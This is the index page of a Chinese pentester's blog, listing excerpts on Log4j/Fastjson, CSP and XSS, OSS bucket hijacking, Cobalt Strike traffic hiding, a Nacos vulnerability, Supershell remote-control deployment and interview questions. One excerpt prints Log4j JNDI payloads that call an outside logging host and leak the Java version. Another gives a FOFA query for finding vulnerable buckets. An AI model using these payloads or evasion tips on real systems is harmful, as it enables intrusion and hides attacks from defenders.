[置顶] 关于我 About Me
摘要: 本博客主要用于个人经验积累和知识分享,如有描述错误问题,请大佬在评论区中指正。 若您利用文章内的技术手段进行任何非法行为,您需自行承担相应后果,作者将不承担任何法律及连带责任。 LinkPoc 出生于2001年,毕业于福州某不知名大学 && 现任职北京某数字厂商,是一名 CTFer && 白帽 。 阅读全文
posted @ 2021-12-08 23:16 LinkPoc 阅读(219) 评论(0) 推荐(0)
2025年3月25日
log4j、fastjson到底算反序列化漏洞还是JNDI注入漏洞?
摘要: 结论:log4j是JNDI注入漏洞,可利用漏洞导致反序列化。 而fastjson是反序列化漏洞,可利用漏洞加载JNDI类。 JNDI(Java Naming and Directory Interface)是 Java 提供的一种 API,用于访问命名和目录服务(如 LDAP、RMI、DNS 等) 阅读全文
posted @ 2025-03-25 12:52 LinkPoc 阅读(122) 评论(0) 推荐(1)
2025年3月24日
CSP安全策略与XSS漏洞的关系
摘要: CSP与XSS漏洞的关系 1、CSP不依赖漏洞的存在: 2、CSP是独立的安全机制,其有效性取决于策略本身的严格性,而非漏洞是否存在。 例如: 严格CSP(基于nonce):即使站点存在XSS漏洞,攻击者也无法伪造合法的 nonce 值来执行脚本。 宽松CSP(允许unsafe-inline):若漏 阅读全文
posted @ 2025-03-24 15:34 LinkPoc 阅读(116) 评论(0) 推荐(0)
2024年6月14日
阿里云OSS存储桶Bucket 劫持漏洞
摘要: fofa搜索语句:product="AliyunOSS" && body="NoSuchBucket" 访问https://xxx.oss-ap-south-1.aliyuncs.com/ 发现 <Code>NoSuchBucket</Code> <HostId>pkdyxxxx.img-cn-ho 阅读全文
posted @ 2024-06-14 17:16 LinkPoc 阅读(693) 评论(0) 推荐(0)
2024年6月5日
23年9月-24年6月公开漏洞整理
该文被密码保护。 阅读全文
posted @ 2024-06-05 16:00 LinkPoc 阅读(3) 评论(0) 推荐(0)
2024年2月28日
Cobalt Strike特征隐藏和流量加密
摘要: Cobalt Strike特征隐藏和流量加密 因用公司办公网络做安全测试而被XDR捕捉到流量特征故有此篇。 悲报,还被提交了工单。 做安全测试不要用公司网!不要用公司网!不要用公司网! 服务器开启禁Ping 命令: vim /etc/sysctl.conf 添加一行 net.ipv4.icmp_ec 阅读全文
posted @ 2024-02-28 11:28 LinkPoc 阅读(1181) 评论(0) 推荐(0)
2023年12月21日
Nacos未授权 CVE-2021-29441
摘要: Nacos未授权 CVE-2021-29441 环境搭建 环境dockerfile在文末 环境启动 docker-compose up -d 查看下当前的容器 docker ps 漏洞复现 访问Web页面 127.0.0.1:8848 抓包,访问http://127.0.0.1:8848/nacos 阅读全文
posted @ 2023-12-21 15:23 LinkPoc 阅读(275) 评论(0) 推荐(0)
2023年9月21日
Supershell远控部署
摘要: 今天搭建了一下supershell,蛮好用的,推荐一手。 GITHUB地址:https://github.com/tdragon6/Supershell 部署 首先必须要先有一台自己的公网服务器,可以考虑阿里云,腾讯云,华为云,百度云之类的。 然后就开始搭建! 输入命令行,下载解压源码 wget h 阅读全文
posted @ 2023-09-21 18:40 LinkPoc 阅读(2033) 评论(0) 推荐(0)
2023年9月13日
中电安科一、二面
摘要: 蛮简单的,拿下offer 中电安科一面 这是一家偏向工控的安全公司 自我介绍 web比较熟的漏洞有哪些?最熟的是哪个? 文件上传呢? 反序列化漏洞了解过吗? 提权接触过吗? 协议通信了解过吗? 你对工控安全有了解吗? 对病毒有多什么研究吗? 可以介绍一下XSS吗? 拒绝服务攻击和分布式拒绝服务攻击有 阅读全文
posted @ 2023-09-13 23:32 LinkPoc 阅读(121) 评论(0) 推荐(0)
2023年9月12日
360安全研究一、二面
摘要: 360安全研究一面 ps:中间一半的时候才开始录的,整理了一下后半段的面试问题。中间一半的时候才开始录的,整理了一下后半段的面试问题。 自我介绍 sqlmap针对时间盲注该用什么参数? MSF使用上的流程? 你经常用MSF的用来做什么? 内网里不出网,如何搭建隧道? 如果说内网里拿到层层主机,如何配 阅读全文
posted @ 2023-09-12 18:24 LinkPoc 阅读(195) 评论(0) 推荐(0)
2023年9月8日
关于面试常问到的几种Java反序列化
摘要: 更新一下笔记中JAVA的几个知名的反序列化漏洞,仅漏洞poc和原理,无分析过程。 Log4j 条件:出网(因为需要请求jndi服务器) ${jndi:ldap://yuvs2b.ceye.io} //外带请求 ${jndi:ldap://${java:version}.f2478a5a.ipv6.1 阅读全文
posted @ 2023-09-08 17:50 LinkPoc 阅读(554) 评论(0) 推荐(0)
下一页
点击右上角即可分享
微信分享提示